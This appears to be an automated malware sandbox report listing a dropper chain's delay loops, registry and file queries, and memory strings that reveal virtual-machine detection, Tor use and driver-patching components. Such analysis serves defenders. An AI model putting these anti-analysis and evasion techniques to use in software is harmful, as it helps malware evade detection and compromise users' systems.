                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7464Thread sleep time: -597687s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7464Thread sleep time: -597578s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7464Thread sleep time: -597468s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7464Thread sleep time: -597359s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7464Thread sleep time: -597250s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7464Thread sleep time: -597140s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7464Thread sleep time: -597031s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7464Thread sleep time: -596919s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7464Thread sleep time: -596811s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7464Thread sleep time: -596676s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7464Thread sleep time: -596562s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7464Thread sleep time: -596453s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7464Thread sleep time: -596343s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7464Thread sleep time: -596231s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7464Thread sleep time: -596125s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7464Thread sleep time: -596015s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7464Thread sleep time: -595771s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7464Thread sleep time: -595640s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7464Thread sleep time: -595530s >= -30000sJump to behavior
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe TID: 7840Thread sleep time: -30000s >= -30000s
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe TID: 7512Thread sleep count: 331 > 30
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe TID: 7512Thread sleep time: -66200s >= -30000s
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe TID: 7556Thread sleep time: -600000s >= -30000s
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7748Thread sleep count: 1066 > 30
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 332Thread sleep count: 60 > 30
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7724Thread sleep count: 206 > 30
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7920Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\u69w.0.exe TID: 1076Thread sleep count: 333 > 30
                        Source: C:\Users\user\AppData\Local\Temp\u69w.0.exe TID: 1076Thread sleep time: -1998000s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\u4dc.0.exe TID: 8160Thread sleep count: 381 > 30
                        Source: C:\Users\user\AppData\Local\Temp\u4dc.0.exe TID: 8160Thread sleep time: -2286000s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809
                        Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809
                        Source: C:\Users\user\AppData\Local\Temp\u69w.1.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809
                        Source: C:\Users\user\AppData\Local\Temp\u69w.1.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809
                        Source: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\Install.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Users\user\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\koEMGMU.exeFile Volume queried: C:\ FullSizeInformation
                        Source: C:\Users\user\Pictures\vU4jsQbpuBQoMcavMx7b1jzX.exeFile Volume queried: C:\Users\user\Desktop FullSizeInformation
                        Source: C:\Users\user\Pictures\nxx62MIcAq1mLUazdUlt2emv.exeFile Volume queried: C:\Users\user\Desktop FullSizeInformation
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCode function: 4_2_0041D9E1 FindFirstFileExA,4_2_0041D9E1
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: 11_2_0041D9E1 FindFirstFileExA,11_2_0041D9E1
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: 11_2_05BCDC48 FindFirstFileExA,11_2_05BCDC48
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCode function: 19_2_0041D9E1 FindFirstFileExA,19_2_0041D9E1
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCode function: 19_2_05CFDC48 FindFirstFileExA,19_2_05CFDC48
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCode function: 21_2_0041D9E1 FindFirstFileExA,21_2_0041D9E1
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCode function: 21_2_041DDC48 FindFirstFileExA,21_2_041DDC48
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6385D46F0 GetSystemInfo,GetNumaHighestNodeNumber,GetCurrentProcess,GetProcessGroupAffinity,GetLastError,GetCurrentProcess,GetProcessAffinityMask,0_2_00007FF6385D46F0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 600000Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599875Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 300000Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599766Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599653Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599547Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599438Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599328Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599219Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599108Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598998Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598891Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598781Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598672Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598558Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598451Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598341Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598216Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598075Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597963Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597833Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597687Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597578Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597468Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597359Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597250Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597140Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597031Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596919Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596811Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596676Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596562Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596453Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596343Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596231Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596125Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596015Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595771Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595640Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595530Jump to behavior
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeThread delayed: delay time: 300000
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exeFile opened: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\
                        Source: C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exeFile opened: C:\Users\user\AppData\
                        Source: C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exeFile opened: C:\Users\user\
                        Source: C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exeFile opened: C:\Users\user\AppData\Local\
                        Source: C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exeFile opened: C:\Users\user\AppData\Local\Temp\
                        Source: C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exeFile opened: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\Install.exe
                        Source: zUOgRazdYnb35XHU4UIsV9Yc.exe, 00000021.00000001.1945506899.0000000000400000.00000040.00000001.01000000.00000018.sdmpBinary or memory string: ... omitting accept-charsetafter EfiGuardallocfreetracebad allocCountbad record MACbad restart PCbad span statebtc.usebsv.comcert installedchecksum errorcontent-lengthcouldn't patchdata truncateddistributor_iddriver removederror responsefile too largefinalizer waitgcstoptheworldget uptime: %wgetprotobynamegot system PIDinitial serverinternal errorinvalid syntaxis a directorykey size wronglevel 2 haltedlevel 3 haltedmemprofileratemultipartfilesneed more datanil elem type!no module datano such deviceopen event: %wparse cert: %wprotocol errorread certs: %wread_frame_eofreflect.Value.remove app: %wruntime: full=runtime: want=s.allocCount= semaRoot queueserver.versionstack overflowstart task: %wstopm spinningstore64 failedsync.Cond.Waittext file busytime.Location(timeEndPeriodtoo many linkstoo many userstorrc filenameunexpected EOFunknown code: unknown error unknown methodunknown mode: unreachable: unsafe.PointeruserArenaStatevirtualbox: %wvmwaretray.exevmwareuser.exewii libnup/1.0winapi error #window createdwork.full != 0xenservice.exezero parameter with GC prog
                        Source: zUOgRazdYnb35XHU4UIsV9Yc.exe, 00000021.00000001.1945506899.0000000000400000.00000040.00000001.01000000.00000018.sdmpBinary or memory string: entersyscallexit status failed to %wfound av: %sgcBitsArenasgcpacertracegetaddrinfowgot TI tokenguid_machineharddecommithost is downhttp2debug=1http2debug=2illegal seekinjector.exeinstall_dateinvalid baseinvalid pathinvalid portinvalid slotiphlpapi.dllkernel32.dllmachine_guidmadvdontneedmax-forwardsmheapSpecialmsftedit.dllmspanSpecialnetapi32.dllno such hostnon-existentnot pollableoleaut32.dllout of rangeparse PE: %wproxyconnectrandautoseedrecv_goaway_reflect.Copyreleasep: m=remote errorremoving appruntime: gp=runtime: sp=s ap traffics hs trafficself-preemptsetupapi.dllshort bufferspanSetSpinesweepWaiterstraceStringstraffic/readtransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=worker mode wtsapi32.dll != sweepgen (default %q) (default %v) MB globals, MB) workers= called from flushedWork idlethreads= in host name is nil, not nStackRoots= out of range pluginpath= s.spanclass= span.base()= syscalltick= work.nproc= work.nwait= %s/rawaddr/%s%s\%s\drivers, gp->status=, not pointer-bind-address-byte block (3814697265625: unknown pc Accept-RangesAuthorizationCLIENT_RANDOMCONNECTION-IDCONNECT_ERRORCache-ControlCertOpenStoreCoTaskMemFreeConnectServerContent-RangeDONT-FRAGMENTDeleteServiceDestroyWindowDistributorIDECDSAWithSHA1EnumProcessesExitWindowsExFQDN too longFindFirstFileFindNextFileWFindResourceWFreeAddrInfoWGC sweep waitGeoIPFile %s
                        Source: PA8JWMmRYiQsN7iqTjOvjsbW.exe, 00000020.00000001.1883456337.0000000000400000.00000040.00000001.01000000.00000017.sdmp, zUOgRazdYnb35XHU4UIsV9Yc.exe, 00000021.00000001.1945506899.0000000000400000.00000040.00000001.01000000.00000018.sdmpBinary or memory string: DnsRecordListFreeENHANCE_YOUR_CALMEnumThreadWindowsFLE Standard TimeFailed DependencyGC assist markingGMT Standard TimeGTB Standard TimeGetCurrentProcessGetShortPathNameWHEADER_TABLE_SIZEHKEY_CLASSES_ROOTHKEY_CURRENT_USERHTTP_1_1_REQUIREDIf-Modified-SinceIsTokenRestrictedLookupAccountSidWMESSAGE-INTEGRITYMoved PermanentlyOld_North_ArabianOld_South_ArabianOther_ID_ContinuePython-urllib/2.5QueryWorkingSetExRESERVATION-TOKENReadProcessMemoryRegLoadMUIStringWRtlGetCurrentPebSafeArrayCopyDataSafeArrayCreateExSentence_TerminalSysAllocStringLenSystemFunction036Too Many RequestsTransfer-EncodingUnexpected escapeUnified_IdeographUnknown AttributeVGAuthService.exeWSAEnumProtocolsWWTSQueryUserTokenWrite after CloseWrong CredentialsX-Idempotency-Key\System32\drivers\\.\VBoxMiniRdrDN
                        Source: VtmtVe55Jwcf3rOGIU1yezyh.exe, 00000004.00000003.1624901520.0000000006A49000.00000004.00000020.00020000.00000000.sdmp, yPlMO3UKyKRvoEYPhbGYOyT0.exe, 0000000B.00000003.1635257524.0000000006A39000.00000004.00000020.00020000.00000000.sdmp, B46afLBMY0mokUgVdA9CQR52.exe, 00000013.00000003.1674965384.0000000006B79000.00000004.00000020.00020000.00000000.sdmp, u69w.1.exe, 00000023.00000000.1537903237.000000000041C000.00000020.00000001.01000000.0000001A.sdmpBinary or memory string: Datacenter without Hyper-V Core
                        Source: Qg_Appv5.exe, 00000018.00000002.2204224716.000000000739E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0
                        Source: zUOgRazdYnb35XHU4UIsV9Yc.exe, 00000021.00000001.1945506899.0000000000400000.00000040.00000001.01000000.00000018.sdmpBinary or memory string: IP addressIsValidSidKeep-AliveKharoshthiLocalAllocLockFileExLogonUserWManichaeanMessage-IdNo ContentOld_ItalicOld_PermicOld_TurkicOpenEventWOpenMutexWOpenThreadOther_MathPOSTALCODEParseAddr(ParseFloatPhoenicianProcessingPulseEventRIPEMD-160RST_STREAMResetEventSHA256-RSASHA384-RSASHA512-RSASYSTEMROOTSaurashtraSecureBootSet-CookieShowWindowTor uptimeUser-AgentVMSrvc.exeWSACleanupWSASocketWWSAStartupWget/1.9.1Windows 10Windows 11[:^alnum:][:^alpha:][:^ascii:][:^blank:][:^cntrl:][:^digit:][:^graph:][:^lower:][:^print:][:^punct:][:^space:][:^upper:][:xdigit:]\\.\WinMon\patch.exe^{[\w-]+}$app_%d.txtatomicand8attr%d=%s cmd is nilcomplex128connectiondebug calldnsapi.dlldsefix.exedwmapi.dlle.keff.orgexecerrdotexitThreadexp masterfloat32nanfloat64nangetsockoptgoroutine http_proxyimage/avifimage/jpegimage/webpimpossibleindicationinvalid IPinvalidptrkeep-alivemSpanInUsemyhostnameno resultsnot a boolnot signednotifyListowner diedpowershellprl_cc.exeprofInsertres binderres masterresumptionrune <nil>runtime: gs.state = schedtracesemacquiresend stateset-cookiesetsockoptskipping: socks bindstackLarget.Kind == terminatedtext/plaintime.Date(time.Localtracefree(tracegc()
                        Source: zUOgRazdYnb35XHU4UIsV9Yc.exe, 00000021.00000001.1945506899.0000000000400000.00000040.00000001.01000000.00000018.sdmpBinary or memory string: acceptactivechan<-closedcookiedirectdomainefenceempty exec: expectfamilygeoip6gopherhangupheaderinternip+netkilledlistenminutenetdnsnumberobjectoriginpopcntrdtscpreadatreasonremoverenamereturnrun-v3rune1 secondselectsendtoserversocketsocks socks5statusstringstructsweep sysmontelnettimersuint16uint32uint64unuseduptimevmhgfsvmxnetvpc-s3wup_hsxennetxensvcxenvdb %v=%v, (conn) (scan (scan) MB in Value> allocs dying= flags= len=%d locks= m->g0= nmsys= pad1= pad2= s=nil
                        Source: Qg_Appv5.exe, 00000018.00000002.2204224716.000000000739E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1!0
                        Source: zUOgRazdYnb35XHU4UIsV9Yc.exe, 00000021.00000001.1945506899.0000000000400000.00000040.00000001.01000000.00000018.sdmpBinary or memory string: (MISSING)(unknown), newval=, oldval=, size = , tail = -07:00:00/api/cdn?/api/poll127.0.0.1244140625: status=AuthorityBassa_VahBhaiksukiClassINETCuneiformDiacriticEVEN-PORTExecQueryFindCloseForbiddenGetDIBitsHex_DigitInheritedInstMatchInstRune1InterfaceKhudawadiLocalFreeMalayalamMongolianMoveFileWNabataeanNot FoundOP_RETURNOSCaptionPalmyreneParseUintPatchTimePublisherReleaseDCRemoveAllSTUN addrSamaritanSee OtherSeptemberSundaneseSysnativeToo EarlyTrailer: TypeCNAMETypeHINFOTypeMINFOUse ProxyVBoxGuestVBoxMouseVBoxVideoWSASendToWednesdayWindows 7WriteFileZ07:00:00[%v = %d][:^word:][:alnum:][:alpha:][:ascii:][:blank:][:cntrl:][:digit:][:graph:][:lower:][:print:][:punct:][:space:][:upper:]_outboundatomicor8attributeb.ooze.ccbad indirbus errorchallengechan sendcomplex64connectexcopystackcsrss.exectxt != 0d.nx != 0dns,filesecdsa.netempty urlfiles,dnsfn.48.orgfodhelperfork/execfuncargs(gdi32.dllhchanLeafimage/gifimage/pnginittraceinterfaceinterruptinvalid nipv6-icmplocalhostmSpanDeadnew tokennil errorntdll.dllole32.dllomitemptyop_returnpanicwaitpatch.exepclmulqdqpreemptedprintableprofBlockprotocol proxy.exepsapi.dllquestionsreboot inrecover: reflect: rwxrwxrwxscavtracestackpoolsucceededtask %+v
                        Source: zUOgRazdYnb35XHU4UIsV9Yc.exe, 00000021.00000001.1945506899.0000000000400000.00000040.00000001.01000000.00000018.sdmpBinary or memory string: VirtualUnlockWINDOW_UPDATEWTSFreeMemoryWriteConsoleW[FrameHeader \\.\VBoxGuestaccept-rangesaccess deniedadvapi32.dll
                        Source: B46afLBMY0mokUgVdA9CQR52.exe, 00000013.00000002.1935720214.0000000005DC0000.00000004.00000020.00020000.00000000.sdmp, l0nXYBHJHVq6UHyy1YDO9fn3.exe, 0000001D.00000002.1950262474.0000000005EAF000.00000004.00000020.00020000.00000000.sdmp, l0nXYBHJHVq6UHyy1YDO9fn3.exe, 0000001D.00000002.1941782899.0000000004437000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                        Source: Qg_Appv5.exe, 00000018.00000002.2204224716.000000000739E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1
                        Source: Qg_Appv5.exe, 00000018.00000002.2204224716.000000000739E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.0
                        Source: zUOgRazdYnb35XHU4UIsV9Yc.exe, 00000021.00000001.1945506899.0000000000400000.00000040.00000001.01000000.00000018.sdmpBinary or memory string: too many linkstoo many userstorrc filenameunexpected EOFunknown code: unknown error unknown methodunknown mode: unreachable: unsafe.PointeruserArenaStatevirtualbox: %wvmwaretray.exevmwareuser.exewii libnup/1.0winapi error #window createdwork.full != 0xenservice.exezero parameter with GC prog
                        Source: u69w.1.exe, 00000023.00000000.1537903237.000000000041C000.00000020.00000001.01000000.0000001A.sdmpBinary or memory string: VMWARE_VIRTUAL
                        Source: t7IXQJi6R3tWUMJ8f9cQzMWm.exe, 00000015.00000002.1930649503.00000000043AD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`:@
                        Source: Qg_Appv5.exe, 00000018.00000002.2204224716.000000000739E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: noreply@vmware.com0
                        Source: u69w.1.exe, 00000023.00000002.1911027770.0000000000A22000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                        Source: zUOgRazdYnb35XHU4UIsV9Yc.exe, 00000021.00000001.1945506899.0000000000400000.00000040.00000001.01000000.00000018.sdmpBinary or memory string: tracebackunderflowunhandleduninstallunzip Torunzip: %wurn:uuid:w3m/0.5.1wbufSpanswebsocketxenevtchn} stack=[ netGo = MB goal, flushGen for type gfreecnt= heapGoal= pages at ptrSize= runqsize= runqueue= s.base()= spinning= stopwait= stream=%d sweepgen sweepgen= targetpc= throwing= until pc=%!(NOVERB)%!Weekday(%s.uuid.%s%s|%s%s|%s(BADINDEX), bound = , limit = -noprofile-uninstall.localhost/dev/stdin/etc/hosts/show-eula12207031256103515625: parsing :authorityAdditionalBad varintCampaignIDCancelIoExChorasmianClassCHAOSClassCSNETConnectionContent-IdCreateFileCreatePipeDSA-SHA256DeprecatedDevanagariDnsQuery_WECDSA-SHA1END_STREAMERROR-CODEException GC forced
                        Source: 0FR80IiNvxJZyXnpOgiDlYNV.exe, 00000024.00000001.2063500056.0000000000843000.00000040.00000001.01000000.0000001B.sdmpBinary or memory string: main.isRunningInsideVMWare
                        Source: B46afLBMY0mokUgVdA9CQR52.exe, 00000013.00000002.1918787360.00000000041ED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V C$
                        Source: zUOgRazdYnb35XHU4UIsV9Yc.exe, 00000021.00000001.1945506899.0000000000400000.00000040.00000001.01000000.00000018.sdmpBinary or memory string: , i = , not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.local.onion/%d-%s370000390625:31461<-chanAcceptAnswerArabicAugustBUTTONBasic BitBltBrahmiCANCELCONIN$CancelCarianChakmaCommonCookieCopticExpectFltMgrFormatFridayGOAWAYGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLengthLepchaLockedLycianLydianMondayPADDEDPcaSvcPragmaRejangSCHED STREETServerStringSundaySyriacTai_LeTangutTeluguThaanaTypeMXTypeNSUTC+12UTC+13UTC-02UTC-08UTC-09UTC-11VBoxSFWINDIRWanchoWinMonWinmonX25519Yezidi[]byte\??\%s\csrss\ufffd
                        Source: VtmtVe55Jwcf3rOGIU1yezyh.exe, 00000004.00000003.1624901520.0000000006A49000.00000004.00000020.00020000.00000000.sdmp, yPlMO3UKyKRvoEYPhbGYOyT0.exe, 0000000B.00000003.1635257524.0000000006A39000.00000004.00000020.00020000.00000000.sdmp, B46afLBMY0mokUgVdA9CQR52.exe, 00000013.00000003.1674965384.0000000006B79000.00000004.00000020.00020000.00000000.sdmp, u69w.1.exe, 00000023.00000000.1537903237.000000000041C000.00000020.00000001.01000000.0000001A.sdmpBinary or memory string: Datacenter without Hyper-V Full
                        Source: zUOgRazdYnb35XHU4UIsV9Yc.exe, 00000021.00000001.1945506899.0000000000400000.00000040.00000001.01000000.00000018.sdmpBinary or memory string: and got= max= ms, ptr tab= top=%s %q%s %s%s*%d%s/%s%s:%d%s=%s&#34;&#39;&amp;+0330+0430+0530+0545+0630+0845+1030+1245+1345, fp:-0930.avif.html.jpeg.json.wasm.webp1.4.2156253.2.250001500025000350004500055000650512560015600278125:***@:path<nil>AdlamAprilBamumBatakBuhidCall ClassCountDograECDSAErrorFlagsFoundGetDCGreekHTTP/KhmerLatinLimbuLocalLstatMarchNONCENushuOghamOriyaOsageP-224P-256P-384P-521PGDSEREALMRangeRealmRunicSHA-1STermTakriTamilTypeAUSTARUUID=\u202] = (allowarrayatimebad nchdirchmodclosecsrssctimedeferfalsefaultfilesfloatgcinggeoipgnamegscanhchanhostshttpsimap2imap3imapsinit int16int32int64matchmheapmkdirmonthmtimentohspanicparsepgdsepop3sproxyrangermdirrouterune scav schedsdsetsleepslicesockssse41sse42ssse3sudogsweeptext/tls: torrctotaltraceuint8unameusageuser=utf-8valuevmusbvmx86write B -> Value addr= alloc base code= ctxt: curg= free goid jobs= list= m->p= max= min= next= p->m= prev= span=% util%s.exe%s.sys%s: %s(...)
                        Source: VtmtVe55Jwcf3rOGIU1yezyh.exe, 00000004.00000003.1624901520.0000000006A49000.00000004.00000020.00020000.00000000.sdmp, yPlMO3UKyKRvoEYPhbGYOyT0.exe, 0000000B.00000003.1635257524.0000000006A39000.00000004.00000020.00020000.00000000.sdmp, B46afLBMY0mokUgVdA9CQR52.exe, 00000013.00000003.1674965384.0000000006B79000.00000004.00000020.00020000.00000000.sdmp, u69w.1.exe, 00000023.00000000.1537903237.000000000041C000.00000020.00000001.01000000.0000001A.sdmpBinary or memory string: Enterprise without Hyper-V Full
